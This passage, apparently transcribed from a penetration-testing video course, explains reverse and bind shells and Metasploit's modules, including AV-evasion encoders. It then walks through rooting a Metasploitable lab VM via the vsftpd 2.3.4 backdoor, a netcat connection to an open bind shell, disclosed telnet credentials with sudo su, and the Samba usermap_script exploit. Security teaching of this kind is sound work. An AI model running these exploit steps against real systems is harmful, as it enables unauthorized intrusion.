company. Now, this is just an example, but stuff like this happens a lot. Matter of fact, most of the hacking that happens that you read about happens this way, and not by someone finding a 0 day vulnerability on a fully secured company. Remember, people are always the weakest spot. So if you can hack something through them, why would you bother trying to discover a technical vulnerability that might not even be there? In the next video, we're only left to talk briefly about shells and different types of shells that we want to drop once exploiting the target. After that, we are ready to get our hands dirty and start gaining access to our target machine. See you in the next video. Before we get into Metasploit framework and its structure inside of our Kali Linux, let us first talk about reverse shells and bind shells. As we already mentioned, shell is our access to the target machine. With the help of shell, we execute commands and control the target system. So shell is essentially our payload that we drop on machine after exploiting it. However, there are two different types of shells. We got reverse shells and bind shells. Now, reverse shells are something that you will use a lot. It works on principle of target machine trying to connect back to our Kali Linux machine. For this to work on our Kali Linux machine, we must first listen for the incoming connection over some port. Then we exploit the target and drop a shell which will tell that target machine to connect to our port on Kali Linux that we're listening on. After it completes the connection, we can then control that machine. On the other hand, bind shell is when the target machine opens their port for us to connect to. In this case, it is the target machine that is listening for the incoming connection on that port. And we are the ones that must connect to that port. After we do it, we can control that target machine. However, there is one problem with bind shell. And it is also one of the main reasons why we won't use it that much. And that is because firewall can forbid target machines to open a port. Many firewalls could have a rule that says don't open any random port for security reasons. Therefore, our bind shell would not work even after exploiting the target. However, reverse shells will always work. Why? Well, because the target in that case is just connecting to us. It is the same process as when the target visits a website. It connects to a port on that web server, and it gets the web page of that website back. Just in this case, it will connect to a port on our Kali Linux machine, and we will establish a shell like that. That's why reverse shell is always a better option if possible. Alright, cool. Now we are ready to start introducing ourselves to the Metasploit framework, the number one tool that we will use for exploitation. It is as important as Nmap, and we will use it a lot, so it is important we get its basics down first. It is not hard, however, it will take some practice to get used to it. Let's get straight into it. Welcome back. Let us talk about Metasploit framework. We already mentioned that we will use this tool a lot to exploit different targets and their vulnerabilities. But there are a few things we need to learn first about it before we get to use it. Remember when I told you that Metasploit framework offers us thousands of exploits that we can use for Windows, macOS or Linux? While that is true, Metasploit offers us a whole lot more things that we can use besides the exploits. Matter of fact, exploits are just one of 7 modules that we can get with Metasploit. Besides them, we also get payloads, auxiliary modules, encoders, evasion modules, NOPs, and post-exploitation modules. If you're new to all of this, you probably have no idea what each of them are. Don't worry, we will explain it right now. First, to navigate to the Metasploit framework directory, we can type cd/user/share and then Metasploit-framework. You can just type meta and then tab it to autocomplete it. If I press here enter, and if I type ls right here in the Metasploit framework directory, we're going to see quite a few things. One of the most important things right here is this MSF console. And this is an executable file. This is our program. If we wanted to run Metasploit, we would just type MSF console in the terminal and it would open the Metasploit framework. The MSF Venom is also very important. This is a tool that we will use to generate a payload or a shell that we use to control the target machine with. But for this video, what we want to explain is this modules directory. If we change to that directory, so cd modules, and I type ls here, we will see those 7 modules that I mentioned. Let's talk about each one of them a little bit. We're already familiar with exploits, right? Let's go to that directory first. So cd exploits. And just to remind ourselves that an exploit module or program executes a sequence of commands to target a specific vulnerability in a system or application. It takes advantage of that vulnerability in order to provide us an access to that machine. There are a few different types of exploits, such as for example buffer overflow, code injection, web application exploits. But what is also important to mention right here regarding Metasploit is that once we type ls inside of this exploits directory, you will see these exploits are split into different groups. We got Windows exploits, OS X exploits, Linux exploits, Firefox exploits, and many others as well. And if we go to any of them, for example, let's go to Windows exploits, and I type ls right here, we will get even more division of exploits. All of the Windows exploits that we have are divided into a bunch of other submodules such as FTP, Firewall, SMTP, SMB, and others. And all of them contain exploits for those specific things. If we navigate to, for example, HTTP Windows exploits, so let's go there. And I clear the screen, type ls right here. We will see there is a lot of them for the HTTP. And this .rb that all of these files have is just an extension for Ruby language. All of the exploits in Metasploit framework are coded inside of our Ruby language. And each one of these programs right here exploits a different vulnerability. If you were, for example, interested in how some of these work, you could open the code of an exploit using Nano Editor. Let's see, for example, this one. If I nano it, it will open the code of this exploit. And if you know Ruby language, you could figure out how this exploit works, right? It also gives us a description right here. So this exploits a stack buffer overflow in the Webster HTTP server. The server and source code was released within an article from the Microsoft System Journal in February 1996, titled Write a Simple HTTP. So this is an old exploit. But you can do this for any file that you want. You can just open it and see the code of that specific exploit. And that's how they are stored in Kali Linux. Let's also mention other modules that exist besides these. So if I go back to the modules directory and type ls, let's next talk about the auxiliary modules. So if I change directory to auxiliary and I type ls right here, then we will see that auxiliary modules are also split into different categories, as we can see right here. And an auxiliary module does not execute a payload like an exploit module does. It is used to perform different actions such as scanning, fuzzing, or denial of service attacks. These modules can sometimes be used in first two stages of penetration test, as there is a lot of them that perform fingerprinting and vulnerability scanning. If we go to one of these submodules, for example, let's go to sniffer submodule. If I type cd sniffer, type ls, well, it seems that there is only one sniffer in Metasploit. And we can see again it is also coded in Ruby language because of the .rb extension. If we go to a different auxiliary submodule, for example, let's go to this one, which is spoofing. So let's go to the spoofers, clear the screen, type ls. We can see they're also divided into even more submodules based on what it is spoofing. So it can spoof ARP requests, it can spoof DNS, it can spoof MDNS, and others as well. And all of these spoofers we can use for our attacks if we need to. Good. Those are the auxiliary modules. Now, you can always explore others as well if you want to check out what different files this module has. But we're going to continue and we're going to cover the next module from the Metasploit framework, which is the post exploitation module. And if I change directory to the post exploitation module, clear the screen and type ls, this module is used, as its name says, after exploiting the target. Usually, they're used to gather or steal information from target's device. That information could be files, saved passwords, dumping hashes, enumerating other services and applications on the target, and many other things we can do with post-exploitation modules. After you type ls, you will see that they are mostly split the same as the exploits. If we go to Windows post-exploitation modules and type ls right here, we will see different post-exploitation submodules that have different purposes, such as gathering information, such as escalating privileges. And these escalating privileges simply means if we exploit the target as a regular user on that machine, we would always want to try to escalate our privilege to become an administrator or a root account. We can also see VLAN post-exploitation modules, and I believe this would be used to steal saved wireless passwords to the access points that the target was connected to. Okay, you can explore the others as well if you want to, and let's talk about the others as well, so we can go through all of them real fast so you can get a pretty good understanding of what all of these modules do. And the next one that we will talk about is also really important, and that is payloads. If I change directory to payloads, clear the screen, and type ls, and hopefully you remember that payload is something we deliver to the target with an exploit in order to control that machine. And in this payloads directory, we can see it is split in 3 different subdirectories: singles, stagers, and stages. What does this even mean? Well, singles are payloads that are completely standalone. A single payload can be something as simple as adding a user to the target system or running some other application. Stagers set up a network connection between the attacker and victim and are designed to be small and reliable. And lastly, stages are payload components that are downloaded by stagers modules. These payload stages can provide us with advanced features with no size limits, such as, for example, different command shells or meterpreter shells. And meterpreter is something that we mentioned for the first time. Meterpreter shell is also something that we will use a lot. It is similar to the command shell, but with a bunch of other options as well besides executing commands. We can download files, upload files, record microphone conversation, run webcams on target machine, take screenshots of their desktop, and many other things we can do with the meterpreter. So once we are exploiting a target, meterpreter is usually what we want to run on that target after an exploit. If I go to stagers directory right here, so cd stagers, clear the screen, type ls, and if I, for example, go to Windows stagers, type ls, here we can see different ways of establishing connection. Remember when we talked about 2 different types of shells in the last video? Well, here they are. Here we can establish a connection either by binding to a port or by listening and creating a reverse shell connection. They are further divided into, for example, reverse HTTP, reverse UDP, and reverse TCP. And out of all of these that we have right here, we will almost always use reverse TCP. So for now we know that 2 main things we will combine in a payload is reverse TCP connection and a meterpreter shell, because that 2 combined give us much more options to do with the target. Okay, great. Now, if you don't understand some of this, don't worry once again. This is something that you will fully understand once we get into the practical examples. For now, we're left to explain 3 more modules, and we're going to go quickly through them, since they are less important than the ones that we already covered. And those are the evasion modules, encoders, and NOPs. Now, let's go with encoders first. Encoders are something that helps us to evade antivirus detection. How exactly? Well, even though we call our payload a shell or a meterpreter, what it is to antiviruses and other people, it is just a simple malware or Trojan or a virus. That's why, with the help of encoders, we can encode our payload and make it less detectable by some antivirus vendors. These are not that useful anymore since they are known to almost all antiviruses. They can, however, help us bypass some of them. And evasion modules do pretty much the same thing. And if I change directory to them, so cd evasion, you will see that there are evasion modules only for Windows. And they are used to bypass Windows Defender. If I change my directory right here, type ls, we will see different Windows Defender files that we use in order to bypass the Windows Defender. However, since Windows Defender recently got an update, I believe many of these don't work anymore. But don't worry, we will see later in the course different techniques that we can use to bypass antiviruses and execute our payload. And the last thing that we got are NOPs. NOPs can be a little bit hard to understand. What a NOP is an instruction for the processor to do nothing. Once a processor reads a NOP instruction, it does absolutely nothing. And I know what you're thinking, what is the purpose of this for us? Well, these NOPs are useful in buffer overflows to allocate a lot of space in memory before the payload executes. By the way, NOP stands for No Operations, and if you ever programmed in assembly before, you will be familiar with this. But don't worry, for now, NOPs are not that important for us. Okay, that was a lot to take for one single video, but all of this will be more clear once we start exploiting our target, and trust me, we're really close to that. We just need to explain the usage of Metasploit in the next video real quick, and after it, we will perform our first exploits. So get ready and I will see you in the next video. Welcome back. In the previous video, we talked about Metasploit framework structure. We explained all of the modules and what they are for, but we haven't really ran the framework itself. In this video, we're going to run it and cover some of the basic commands for it. Okay, I already mentioned in the last video that to open this framework, what we must do is open our terminal and type msf console. Press enter, and keep in mind that it might take some time to open, especially if you're running it for the first time. And here it is, it already opened for me, and what we get right here is we get the banner of Metasploit framework, which changes every time you start this program, and down here we get these 7 modules that we talked about. And we also get the exact number of modules that we have available to us. So here we can see 2043 exploits, 1105 auxiliary modules, 344 post-exploitation modules, over 500 payloads, and a little bit of encoders, NOPs, and evasion modules. As in every other tool that we covered, to see all the available commands we can use, we can run the help command. This will open the help menu, which will give us all the available options, as well as some of the examples of how we can use Metasploit. But for now, this is not necessary, as I will show you a few of these commands that you will use every time. And by the way, before we get into those commands, what you can do inside of the Metasploit framework, you can also run the normal commands, such as ls, such as changing directories, such as, for example, running ifconfig. So if I type sudo ifconfig and type in my password, it will give me the output of ifconfig. So you can also run regular terminal commands from this. But as far as the Metasploit framework goes, let's start with listing some of the modules. For example, we can use the show command to list out any type of modules we want. So we know that there are over 500 payloads. We saw the number once we started the Metasploit. In order to list all of those 500 payloads, we can type show and then payloads. If I press enter, it will take just a few seconds and it will list out all of the available payloads that we have. Now right here, this is not really that good of an output because I have my terminal a little bit more zoomed in than I should have, so I will just go to the preferences and lower the font of my letters. So I'll click on OK, apply, OK, clear the screen, and I will type show payloads once again. It's still not that good. Let me just go and lower it a little bit more. So I will just go to 13, apply, and click on OK. Clear the screen, run the command again, and here it is. We get a better output. So let's explain what we see right here. If I scroll all the way up to the beginning, we can see this is the number of the payload. It goes from 0 to over 500, and this right here is the name of the payload. So as we already know, there are bind shells and reverse shells. So we get different types of them. We can see the payloads for Android, the payloads for Apple iOS. We can see all types of payloads, command shells. We can see Java payloads, Linux payloads, if I go all the way down, OS X payloads, PHP payloads, Python, Ruby, and a bunch of others as well. Here's also Windows payloads. So we get a lot of them. Under the rank, they're all manual because they have to get executed on the target machine. And in the description, we can see for what this payload is. For example, if we check out this one, Apple Meterpreter Reverse HTTP, this is the Apple iOS Meterpreter shell or Reverse HTTP inline. So this means you would use this payload if you were, for example, attacking an Apple device. Now, we can do the same thing with exploits. If we want to list all of the 2000 exploits, we can type show exploits. And this might take a little bit longer because there is a lot more exploits than there is payloads. And here they are. Here are all 2041 exploits. You can see the output is pretty much the same as with the payloads. We get the number right here, we get the exploit name, and these exploit names are really well written. As we can see, the first part tells us for what is this exploit. Currently we are inside the Windows exploits. And if we scroll all the way up, we should see some other exploits as well. Let's go and scroll all the way up. Well, it seems that we can only go up to here because there is a lot of them. But nonetheless, we can see for what the exploits are. For example, this one is for Windows and for browser. And here it specifies exactly what does it exploit. If I go down here and, for example, check out these ones, here we can see this is also Windows exploit for the FTP. So they're very well organized, and this is the structure that we saw in the previous video. Just this is how the Metasploit framework outputs it for us. These exploits that belong to Windows FTP are all located inside of the FTP directory of the Windows exploits directory. If I go all the way down, and what we can do right here is we can choose one of these exploits just to see how we can select them and run them. Of course, we are not going to be attacking any target, we just want to see how we can select one of these exploits. So let's go with this one. For example, Windows SMB MS06 040 Net API. And by the way, to check out more information about exploits, we can go on to the right. So this exploit came out in 2006. And in the right column, right here, it tells us what exactly does this exploit do. So for this particular one, we get that it is an exploit for Microsoft Server Service, and it overflows this function. Now, the good part about this is that you don't really need to know how these work in order to be able to run them. Let me show you. If you copy this exploit name right here, so copy Windows SMB MS06 040 Net API, in order to select it, let us clear the screen, we can type the command use. And you type use and then the module name that you want to use. In our case, we want to use an exploit. And after it, all we have to do is paste the exploit name. So use exploit /windows /smb / and then the name of the exploit. Press enter. And we will see that this exploit configured payload Windows Meterpreter Reverse TCP. And we will talk about this in just a second. For now, we can see that it is currently using the module that we selected, because it is printed out in red right here, and it also tells us that it is an exploit. So let's check out all the information that we can get for this exploit. The first thing that I always like to do is type the command show info. And this show info command tells us more about this particular exploit. So if we go down here to the description, it will tell us this module exploits a stack buffer overflow. So this is a buffer overflow exploit in the Net API 32 canonicalize path name function using this RPC. And you can read about any exploit that you select. Another information that we get right here are some of the references. So you can visit these links right here to read more about this particular exploit. Besides this, another command that we can do is show options. And this is the important part. Let me just clear the screen and type it once again just so we can see only the options part, here is where you select your options for the exploit. First thing we see is module options, and it asks us for 3 different things. And keep in mind, different exploits will want different things. Usually they will all have these rhosts and rport, which is just the remote host and the remote port, or in our case, the target's IP address and the target's port that we're attacking. So we can see 2 of these are already automatically set. The R port is already set to be 445 and the SMB pipe is already set to be the browser. All we are left to specify right here is the R hosts, or the IP address of the target machine. So if we were attacking a Windows server that was vulnerable to this attack, we would specify here the IP address of that Windows server machine. And in this column right here, you will notice that some of these things will be required and some of these things will not be required. In our case, in this particular exploit, all of these 3 things are required to specify in order for exploit to work. In the description, it tells us exactly what it wants from us, so the rhosts is the target host, or the target's IP address. The R port is the SMB service port on the target machine, and the SMB pipe is the pipe name to use. So these are the exploit options. And down here we get payload options. Now what does this mean? Well, remember, after exploiting the target, we drop a payload. So by default, remember once we ran the command to use this exploit, it gave us Windows Meterpreter reverse TCP by default. This means that we're using a payload for Windows. It is a Meterpreter shell, which remembers it is the best shell that we can get. And it is a reverse shell over TCP connection. You can change this if you want to, and down here we get the options that we need to set for payload. Remember, once using reverse shell, we must listen on our Kali Linux machine for the incoming connection. And that's the information that it asks us right here. The L host is our own IP address, the IP address of Kali Linux machine. Or as it says right here, the listening address. We specify our IP address right here, so you just need to type sudo ifconfig, and we can see 192.168.1.9. Usually the Metasploit framework will set it by default. So let me just clear the screen, run show options once again, and the L port is the listening port, or the Kali Linux port that we want to listen for the incoming connections. And it is usually set by default to be 4444. And all of these options you can change. For example, if you notice that Metasploit framework set the incorrect IP address for a Kali Linux machine, you can type set and then the parameter name, in our case lhost, to be a different IP address. For example, 192.168.1.15. And it will set the lhost parameter to be a different IP address, as we can see right here. Inside of these rhosts, as we can see this is also required, we would set the IP address of our target machine. So let's say we had a Windows server and its IP address was 192.168.1.20. We would type it right here, so 192.168.1.20. And if I type show options once again, now we got this set as well. Now, payload is something that you can change. Usually you want to leave it what Metasploit framework already gave you, because the default one is usually the best one. But sometimes some of the payloads will not work and others will work. So in order to see all of the available payloads that you can use for this particular exploit, you can type show payloads once again. Just this time it will not list out all the 500 possible payloads, it will only list out the possible payloads for this particular exploit. And this will be all the Windows payloads. Since we are attacking a Windows machine with this exploit, the Windows payloads will be something that we can use. So we can see some bind shells, reverse shells, we can see some of the Meterpreter shells. So for example, let us say that you don't want to use a reverse shell, you want to use a bind shell. How would you change the payload? Well, you would copy the bind shell. Let's say we want to use the Meterpreter bind shell, so copy its name. And go all the way down and type set payload and then paste the payload name. So paste selection press enter, and it will tell us the payload has been changed. If I clear the screen, show options, we will see different payload. We no longer have the Meterpreter reverse TCP, we now have the bind TCP Meterpreter. And it will also ask us for different information about the payload. We no longer get the L host, since remember with bind TCP, it is not our Cal Linux machine that is listening for the connection, it is the target machine that is listening for the connection, and we are the ones that connect to it. So in this case, it is asking us for our host, or the remote host, or as the description says, the target IP address. So we would select right here the same IP address that we select right here, because it is the target that has to open the port, and the local port will be the local port on the target machine that will open for us to connect to. And you would select here whatever you want. So what is important to get out all of this is that we can change different options using set command. So you just type set, and then, for example, we want to change the L port, we type L port, and then make it whatever we want. And if we type show options, it will be changed right here. And the last part that we see down here are the targets. And these targets right here are all of the vulnerable targets for this particular exploit. To list all of them out, we can type show and then targets. This will give us a list of all the targets that we can exploit using this attack. So we get Windows NT, Windows XP, and now different versions of Windows XP and Windows 2003. So this is an older exploit that attacks Windows XP machines. Now you can either, if you know exactly which version of Windows is the target running, you can select it right here by specifying set target and then the number. For example, let's say the target is using Windows XP SP1 English. You could type it like this, so set target 3, because the ID for that particular version is 3. Or if you didn't know exactly which version, you would just leave it on automatic, which means that Metasploit framework will figure it out on its own, so we don't need to specify it. The only important thing is that it is one of these versions. If it is, for example, a Windows 7 machine, this exploit will not work. And once you set all of these options, the last thing you need to do is type exploit. In our case, this will not work because we don't really have a vulnerable Windows XP machine, so it will give us an exploit failed error. In this case, it is unreachable because this IP address right here on my local network is not even online. That's why this will not work. And this is pretty much it. Now, there are other commands as well that could be useful, but these are the main ones that we always use to choose exploits and payloads and to set their options. Finally, the time has come. In the next video, we're going to apply what we learned for now to perform our first exploit on the Metasploitable machine. See you in the next video. Hello and welcome back. Are you ready to hack your first target? Everything we learned up to here was building up to this moment. We're going to use all of our previous knowledge that we got to hack our target. Of course, this is just one of the many exploits that we will cover in this course, but it is important because it is our first one. In this case, we're of course going to be attacking the Metasploitable for our first exploit, so make sure you start it up, check out the IP address of Metasploitable. In my case, it is 192.168.1.5. And what I'm going to do is I'm going to open two terminals. In the first one, I will start my MSF console, and in the second one, I will perform the nmap scan for the version of the service. So we already know the command, sudo nmap-sv, and then the IP address of my Metasploitable. It will ask me for the password, I will input it right here, and it will start the scan. And you can open your Metasploit framework once the scan is running, and once you open it, just wait for the scan to finish. Okay, so here it is. This is an output that we're already familiar with. Let's see whether we can exploit the target, and we're going to start in order. Let's go with the FTP port first. So we notice right here which version of service is it running. In this case, VS FTPD 2.3.4. And also keep in mind that there is really no plan once you do something like this. We only know that the goal for us is to find an exploit if this software is vulnerable. Now, even though we know that best search would be us going on internet and typing VSFTP vulnerability, but I myself like to run the search exploit tool first, just to see whether we already have it right here on the machine. So I will open another terminal and I will copy the name of the version, in this case VSFTPD 2.3.4, copy it, and type search exploit and then paste the version name. If I press enter right here, we get one result. We get VSFTPD backdoor command execution. And in the right column, as you remember, we get the path to this exploit. There is one thing that we should notice right here. This is .rb. What does this mean? Well, this most likely means that this exploit belongs to Metasploit framework. And it also tells us that right here in the brackets. So it means that we will have it right here under one of these 2000 exploits. So how we can find it? Of course, we are not going to be listing all the 2000 exploits and trying to find the correct one. What we can do is we can type search and then the software name, so VSFTPD. And here it is. Exploit, Unix, for the FTP, and it is the VSFTPD 2.3.4 version backdoor. It came out in 2011. It is ranked excellent, which means this exploit works, and here is the description for it. Let's read more about it, but first we need to select it. So to do that, we can type use exploit Unix FTP and then the name of the exploit. Press enter, and we can see the payload is default configured to CMD Unix Interact. But we're going to check this out in just a second. Let us first clear the screen and type the command show info. We want to read more about this exploit. So it will tell us in the description, this module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced in the zip file archive between June 30th, 2011 and July 1st, 2011, according to the most recent information available. This backdoor was removed on July 3rd, 2011. Interesting. Let's see whether we got the vulnerable version. So if I clear the screen and type the next command, which is show options, we will see right here what are the things that we need to set up in order for this to work. So in this case, we only got two things. We got the R hosts and we got the R port. And this is the remote host, which is the IP address of our target, and the R port is the port number where the FTP is running on the target machine. If we go to my scan, we will see the port is set correctly, which is port 21. So this is something that we will not change. However, we need to set our remote host IP address. So let's set the IP address of Metasploitable, set R hosts 192.168.1.5 in my case. The payload is set by default, and if I type show payloads to see all of the available payloads that we have, for this particular attack, we only get this single payload. So there is nothing really to change right here. We're going to use that one. And we can see it doesn't require any additional options whatsoever. So the easier for us, the better. Under the description, we can see it is a Unix command. We simply just interact with established connection. So I expect that with this, we're going to be able to execute commands on target machine if we manage to exploit it. Under the targets, we can type show targets to see the available ones, and we got none because this is an actual exploit for the software. So in order to be able to exploit the target has to be running this software version, which in our case it is running. So everything is set. Let us double check, type show options. We got the IP address of the target, we got the port number where the software is running on the target machine, and all we need to type to execute this is type exploit. Press enter, and here it is. We got the command shell session 1 opened on the target system. How do I know this? Well, it doesn't give us any output right here, but if I type, for example, ls, you will see we are getting an output. And this ls didn't execute on our Kali Linux machine. It executed on the Metasploitable. We are on that machine right now. We successfully exploited it. We can run any commands that we want, so if I type who am I, it will tell us that we are the root account. So not only did we manage to hack that machine, we also are root privileged account, so we can do anything we want on it. If I type pwd to check my current directory, I am in the / directory. And if I type ifconfig, just to prove to you that we're on the target machine, we can see the output is 192.168.1.5. So that is the IP address of Metasploitable, as you can see right here. Inside of the / directory that we're currently at, we can create files right now. Let's go to the Metasploitable just to show you, and if I type ls in the / directory, these are the current files inside of this directory. If I type now mkdir and then test, and I type ls once again, now you will see that we successfully created the test directory on the Metasploitable machine. And if we check it on the machine itself, here it is. Here is the test directory that we just created. So we successfully hacked the target. Now the reason we are getting an output like this is because this is not really that good of a shell. This is not a Meterpreter shell, so that we get a well-organized output. But nonetheless, it is a shell indeed. We can execute the commands and we get the output of those commands back. And not only that, but we are a root account on the target system. Now, to exit the shell, we can just type exit. And it will tell us right here, command shell session 1 closed. And it was that easy. We gained root privilege account on the Metasploitable machine, and we could have done anything on it. This is as good as it can get. And this is exactly what we are looking for once we try to exploit a target. Now, sometimes it is this easy, but sometimes it isn't. And we will see some complicated exploits later on, and it will be even more complicated to exploit a target if it doesn't have any vulnerability. But for now, we are happy. We managed to hack our first target. But this is just one of the vulnerabilities. Let's keep exploring and see in the next few videos if the Metasploitable has some other vulnerabilities as well. And then after we finish with Metasploitable, we're going to move on to some other harder targets. Welcome back. In this video, we're going to cover and talk about misconfigurations. And also, in this very video, we will cover the easiest possible vulnerability that you could ever find. You might have already noticed it while we scan Metasploitable, and if you didn't, I will give you a chance to find it right now. So what I did right here is I performed a version scan on the Metasploitable virtual machine. You can do the same, or you can just take a look at the results right here. And do you by any chance see something that sticks out right here? Something that shouldn't be here. Now, you should be able to figure it out based on what we learned for now. So I will just give you a few seconds. And time has come. Have you managed to find it? It is this bind shell right here. And under the version it says Metasploitable root shell. I mean, just by its name we can see that something doesn't seem right. We know what bind shell is, right? So if this service doesn't have any type of authentication, we can just try to connect to this port that hosts this bind shell, in case port 1524 over TCP, and we will be given a root shell on that machine. Can't be that easy, right? Well, it is, and I wouldn't even consider this an exploit. This is just an example of what a misconfiguration could look like. Now, this would be a critical misconfiguration that would almost never happen. But sometimes even stuff like this can happen. Maybe an administrator set up something like this so he can access that machine from his home or from somewhere else, but he forgot to put authentication on it. You never know. Okay, so how can we establish connection to this port? Well, we won't be using Metasploit framework for this particular thing. Instead, we're going to use a tool called Netcat. And Netcat is a program that allows us to establish network connections with other machines using both TCP and UDP. To run the Netcat help menu, we can type nc-h, which stands for help. And here we can see menu isn't that big at all. It only has a few options right here. And at the beginning of the menu, we also got these two main options. We can either connect to somewhere, or we can listen for the inbound or incoming connections. Since our Metasploitable target machine has a bind shell, that means we must connect to somewhere. And the syntax is just nc, then the hostname or the IP address, and then the port. Let's try it out. If I go down here and type nc, and then the IP address of my Metasploitable, I go and check out over which port is the bind shell being hosted. It is over port 1524. And I will type space and then the port. Or let me just clear the screen first and type nc 192.168.1.5 and then space 1524. Press enter. And it worked. We are again a root account on the Metasploitable machine. And as in the previous video, we can do anything we want. So if I type who am I, we can see we are the root account. ls tells us what directories we have. And remember the test directory from the previous video? Here it is. ivconfig will give us the IP address of the Metasploitable machine. So everything works as in the previous video. We are root account and we can execute the commands on the target system. Now, don't get used to this type of exploitation. Matter of fact, I won't even consider this an exploitation because the vulnerability wasn't in software, but in a person who would set something like this up without ever authenticating. Stuff like this rarely happens, but I wanted to show you this just to see whether you will notice it in our scan. In the next video, we're going to check out another quick vulnerability that is based on information disclosure. After that, we're getting slowly into harder and harder exploits. See you in the next video. Welcome to another attack that we will perform on our Metasploitable machine. And this one is aimed on Telnet. Keep in mind that this vulnerability is only possible due to information disclosure. And you will see by the end of this video why. So I got my scan right here and we can see that the Telnet is running on port 23. If we check out the version, it says Linux Telnet D. That doesn't seem to give us that much of information about the actual version. If we just copy this version right here, open another terminal, we could just do the same thing that we did with the FTP version. So we could type searchsploit and then paste the version name. And it seems that we got two different results. And from looking at them, they don't seem to be useful for us. The first one says Netkit Telnet 0.17 and it says in brackets that it's for Fedora 31. And the second one doesn't seem to be something we're looking for either. We can't get the exact version of Telnet, so what are we going to do? Well, we know that Telnet requires username and password in order to log in. So let's maybe try the default credentials. To try them and to connect to the Telnet port on some machine, we can type in our terminal, let's first clear the screen, Telnet, and then the IP address of the machine that we want to connect to. In my case, 192.168.1.5. And I press here enter. Do you see it? Not only do we get the banner for the Telnet, but we also get some additional information that shouldn't be here. We get this statement that says login with msfadmin/msfadmin. And if you remember this banner, and these things are exactly the same as the banner that we get once we log in to the Metasploitable, as you can see right here. These two are exactly the same. They just hosted the same banner on the Telnet open port as well. So if they already gave us username and password, let's use it. Let's see whether it will work on Telnet. If I type msfadmin and msfadmin as the password, here we are. Once again, we are on the Metasploitable machine. Just this time, you will notice that we are not root account. So if I type who am I, we are the MSF admin, we are not the root account. And this is something that we can easily bypass. If I type the command sudo su, it will ask me for the password for the MSF admin, and we already know it from the banner. It is also MSF admin. I type it in, press enter, and now we are root account, as we can see right here. And also if I type who am I, it will tell me we are root account. Now, I know what you're thinking. This is too easy. Something like this will never happen in real life. And you're correct. These types of vulnerabilities will rarely happen. However, we're slowly processing to higher and higher vulnerabilities. The last two were just misconfigurations and information disclosure, while the first FTP vulnerability had a vulnerable software running. After we finish showing a few more vulnerabilities for the Metasploitable machine, we're going to go on to the Windows machines. And you will see that we will manage to exploit them without them having any additional softwares like Metasploitable does. So things are soon about to get even more interesting. See you in the next video. Welcome back. Let's continue with exploiting our Metasploitable machine. So we already found 3 vulnerabilities regarding Telnet, FTP, and the bind shell with no authentication. Let us see what else can we find. And what I got in mind for now is this Samba open port right here. Matter of fact, these two open ports 139 and 445. Why them? Well, because it seems that we do not have the exact version of Samba right here. It tells us that Samba is between 3 point something to 4 point something. So let's see how we will figure out what exploit to use and how to find it. Here's a small hint. We don't need to Google it to be able to find it. We have everything we need right here in Kali Linux. So don't use Google to find it, since it is cheating and you will most likely find it on the first link. Let's see whether we can figure it out by ourselves. So right here in our scan, we have this Samba version right here. Not the exact version, but it does give us some information about in between which range does the version belong to. And that is something. We also see that ports hosting this are 139 and 445. So we do got some information. What now? Well, let's just search Samba inside of SearchSploit and see what comes up. So I got this scan right here, I got my MSF console right here, and I will open a third terminal and type SearchSploit Samba. Well, it seems that we get a lot of results. And these are exploits for a bunch of different Samba versions, as we can see right here. Now, we could just try all of them out to see whether they will work, or we can try to figure out the Samba version first, and then narrow down our exploit search and see whether we find something for that specific version. So, how are we going to find out the Samba version? Our Nmap scan didn't manage to do it. Well, luckily, Nmap is not the only scanner that we can use for these types of things. Remember that in Metasploit framework, besides having all of these exploits and payloads, we also get those auxiliary modules. And those auxiliary modules can sometimes be scanners. Let's search and see whether we can find a scanner for this. If we just type in the Metasploit, search Samba, and press enter, we get some of the results right here. Matter of fact, we will get a lot of the results once again. Some are exploits, some are auxiliary modules, and down here I believe there is one post-exploitation module. And if we go to the auxiliary modules, it will only give us 2 auxiliary scanner modules. These aren't the scanners that we need. Let's try to find it ourselves. If I go down here, clear the screen, and type use auxiliary, and then we search for a scanner, and then SMB, because that is the port that we're enumerating, and then tap twice, these are all of the available auxiliary scanners that we have for SMB. The one that we are particularly interested in is this SMB version. So let's copy it. If I copy the entire command right here, paste it, press enter. Oops, let me just delete this. We typed the command twice. So use auxiliary scanner SMB and then SMB version. And if I type show info right here, it will tell me in the description display version information about each system. This looks like something that we need. Let's type all of the needed information for this to run. So we're going to type show options first, and we require our hosts. We got some other things as well, but these three things are not required, as it says right here. The threads we will leave on 1, and the R hosts will be the IP address of our Metasploitable. In my case, 192.168.1.9. I will set this right here, and if we run it, well, it worked. Even though it says right here host could not be identified, in the brackets we get the exact Samba version on the Metasploitable, which is 3.0.20. Cool. Let's see what we can find from exploits now that we know what version it runs. So I will copy this 3.0.20 and go back to my Certsploit, clear the screen and type it once again. Just this time I will paste the entire version. Press enter, and we managed to narrow it down to only 5 results. And it seems that these two are the same results, so it's actually 4 results in total. The first one seems to be some type of a security bypass, and it affects our version, since it's between 3.0.10 and 3.3.5. But it also seems to be a TXT file, which we really don't want to bother with right now. We want something that we can execute right away. The most interesting thing we have right here is this Samba username map script, or the command execution. Why? Well, it's a Ruby exploit, and it also belongs to Metasploit framework. Plus, it also affects our version of Samba, as we can see right here. These two down here are also TXT files, not really interested in, and they also don't seem to actually affect our version. They only affect the versions below our version. And the last one, which is denial of service or DOS attack, seems to be affecting our version, but we're once again not interested in the denial of service attacks. But in a real penetration test, you would 100% write this on a report with the references to the possible attack. For now, let's just go with the Metasploit module that we found. Let's remember the name, username, map script, command execution. And if I search once again, in my Metasploit, search Samba, let us try to find the exploit that we found using Certsploit. If I go up here, go through all of these results, and here it is. Under the 13, exploit multi-Samba, user map, script command execution. This is the same script that we saw right here. Here it is. If I copy the script name, so exploit multi-Samba, user map script, and type right here use, then paste the script name, it will set the default payload to be command Unix reverse netcat. And by the way, this multi right here means that it can be targeted on multiple operating systems. While as if you had only Windows or Linux specified right here, it would mean that only that specific operating system is vulnerable to this attack. So let's show information about this exploit. I will first clear the screen and type show info, and it will tell us this module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25 when using the non-default username map script configuration operation. And if I also set up all of the things that we need, so show options, seems that we need one thing, which is the R host, so let's set it up right away. This is the IP address of Metasploitable. The port right here we do not want to change, since it is already set correctly, as we can see right here, port 139 is running Samba. And down here is our payload, which is the reverse netcat, we set the IP address of our Kali Linux machine here and any port that we want. Once all of this is ready, we can run our exploit. And here it is. We once again got command shell opened on target system using Samba vulnerability. And we can as usual execute commands. If I type who am I, it will tell me we are root. So we're already highest privilege on that machine. Great. This is the fourth vulnerability we found. To close the connection, we can 